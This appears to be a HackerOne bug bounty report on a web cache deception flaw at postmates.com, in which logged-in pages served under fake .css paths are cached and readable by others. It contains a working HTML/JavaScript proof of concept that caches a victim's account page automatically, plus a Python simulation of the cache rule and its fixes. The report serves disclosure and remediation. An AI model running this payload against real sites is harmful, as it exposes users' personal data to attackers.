Postmates: Web cache poisoning attack leads to user information and more

2019-02-08T11:03:50
ID H1:492841
Type hackerone
Reporter davidalbert
Modified 2019-02-26T12:37:33

Description

Hello, your web server is vulnerable to web cache poisoning attacks. This means that an attacker is able to obtain another user's information.

If you are logged in and visit a URL like this one (for example): https://postmates.com/SomeRandomText.css

Then the server stores the response in the cache, BUT with the logged-in user's information :) A non-logged-in user can then visit the same URL and see the information contained in it, in this case: https://postmates.com/SomeRandomText.css

I have written a small JavaScript/HTML snippet that executes this attack fully automatically; you just need to visit the page and wait about 3 seconds.

Here is the small PoC code:

```html
<html>
<head></head>
<body>
<script>
// Decoy URL: a random name with a static-looking .css extension on the target host
var cachedUrl = 'https://postmates.com/' + generateId() + '.css';
// Opening it while the victim is logged in makes the cache store the personalised response
const popup = window.open(cachedUrl);

function generateId() {
    var content = '';
    const alphaWithNumber = 'QWERTZUIOPASDFGHJUKLYXCVBNM1234567890';

    for (var i = 0; i < 10; i++) {
        content += alphaWithNumber.charAt(Math.floor(Math.random() * alphaWithNumber.length));
    }
    return content;
}

var checker = setInterval(function() {
    if (popup.closed) {
        clearInterval(checker);
    }
}, 200);

// After 3 seconds, close the popup and display the now-cached URL
var closer = setInterval(function() {
    popup.close();
    document.body.innerHTML = 'Victims content is now cached <a href="' + cachedUrl + '">here and the url can be saved on the hackers server</a><br><b>Full Url: ' + cachedUrl + '</b>';
    clearInterval(closer);
}, 3000);
</script>
</body>
</html>
```

Theoretically, the attacker could then store this URL on their own server, but in this example the URL is simply shown. I would suggest keeping an eye on caching for more security, and I hope you enjoyed my report.
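To make the caching issue above concrete, here is an added example (not part of the report and not Postmates' code) that models a shared cache in front of a web origin. The weak rule `extension_policy` caches any response whose path ends in a static-asset extension, which is exactly what lets the decoy `.css` URL capture a logged-in user's page; `hardened_policy` caches only responses the origin explicitly marks `public` whose `Content-Type` agrees with the extension, and `hardened_origin` additionally answers unknown paths with a 404 and marks personalised pages `private, no-store`. The host `example.invalid`, the session values and all function names are constructed for the illustration.

```python
"""Simulation of how a shared cache's cacheability rule decides whether a
personalised response is stored and later served to an anonymous client."""
import posixpath
from dataclasses import dataclass, field
from typing import Callable, Dict
from urllib.parse import urlsplit

# Extensions a cache might treat as static, with the Content-Type each should carry.
STATIC_TYPES = {".css": "text/css", ".js": "application/javascript", ".png": "image/png"}


@dataclass
class Request:
    url: str
    cookies: Dict[str, str] = field(default_factory=dict)


@dataclass
class Response:
    status: int
    headers: Dict[str, str]
    body: str


def leaky_origin(req: Request) -> Response:
    """Constructed origin with the behaviour the report describes: any unknown path
    renders the account page for whoever is logged in, with no Cache-Control header."""
    session = req.cookies.get("session")
    if session:
        return Response(200, {"Content-Type": "text/html"}, f"account page for {session}")
    return Response(200, {"Content-Type": "text/html"}, "login page")


def hardened_origin(req: Request) -> Response:
    """Constructed origin after the fix: unknown paths are 404, personalised pages are
    explicitly uncacheable, and real static assets are explicitly public."""
    path = urlsplit(req.url).path
    if path == "/account" and "session" in req.cookies:
        return Response(200, {"Content-Type": "text/html", "Cache-Control": "private, no-store"},
                        f"account page for {req.cookies['session']}")
    if path == "/static/app.css":
        return Response(200, {"Content-Type": "text/css", "Cache-Control": "public, max-age=86400"},
                        "body{}")
    return Response(404, {"Content-Type": "text/html", "Cache-Control": "no-store"}, "not found")


Policy = Callable[[Request, Response], bool]


def extension_policy(req: Request, resp: Response) -> bool:
    """Weak rule: cache whenever the path merely looks like a static asset."""
    return posixpath.splitext(urlsplit(req.url).path)[1] in STATIC_TYPES


def hardened_policy(req: Request, resp: Response) -> bool:
    """Cache only 200 responses the origin explicitly allows, whose Content-Type
    matches the extension, and that do not set cookies."""
    ext = posixpath.splitext(urlsplit(req.url).path)[1]
    cc = {d.strip().lower() for d in resp.headers.get("Cache-Control", "").split(",")}
    if resp.status != 200 or "Set-Cookie" in resp.headers:
        return False
    if "public" not in cc or cc & {"private", "no-store"}:
        return False
    return STATIC_TYPES.get(ext) == resp.headers.get("Content-Type")


class Cache:
    """Minimal shared cache: the key is the URL alone, as in most CDNs, so cookies
    do not separate one user's copy from another's."""

    def __init__(self, origin: Callable[[Request], Response], policy: Policy):
        self.origin, self.policy, self.store = origin, policy, {}

    def fetch(self, req: Request) -> Response:
        if req.url in self.store:
            return self.store[req.url]
        resp = self.origin(req)
        if self.policy(req, resp):
            self.store[req.url] = resp
        return resp


def run_scenario(origin: Callable[[Request], Response], policy: Policy) -> str:
    """A logged-in victim requests the decoy path first, then an anonymous client
    requests the same URL; returns what the anonymous client receives."""
    cache = Cache(origin, policy)
    url = "https://example.invalid/ABC123XYZ0.css"  # placeholder host, constructed
    cache.fetch(Request(url, {"session": "victim-7"}))
    return cache.fetch(Request(url)).body


if __name__ == "__main__":
    print("weak cache + leaky origin  :", run_scenario(leaky_origin, extension_policy))
    print("hardened cache + leaky origin:", run_scenario(leaky_origin, hardened_policy))
    print("hardened cache + fixed origin:", run_scenario(hardened_origin, hardened_policy))
```

The first scenario prints the victim's account page for the anonymous client; either fix alone (honouring origin headers and content types at the cache, or 404s plus `no-store` at the origin) stops the leak, while genuine static assets under `hardened_origin` are still cached.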

Some information about the attack: https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack.pdf

The screenshots with the steps are in the attachments.

Not important for this report, but I want to look deeper into your website: can you create an account for me? I'm from Germany and don't have an American phone number :)

Impact

A web cache poisoning attack can be used to steal user information such as last name and member ID, which is important for the login security feature (for example).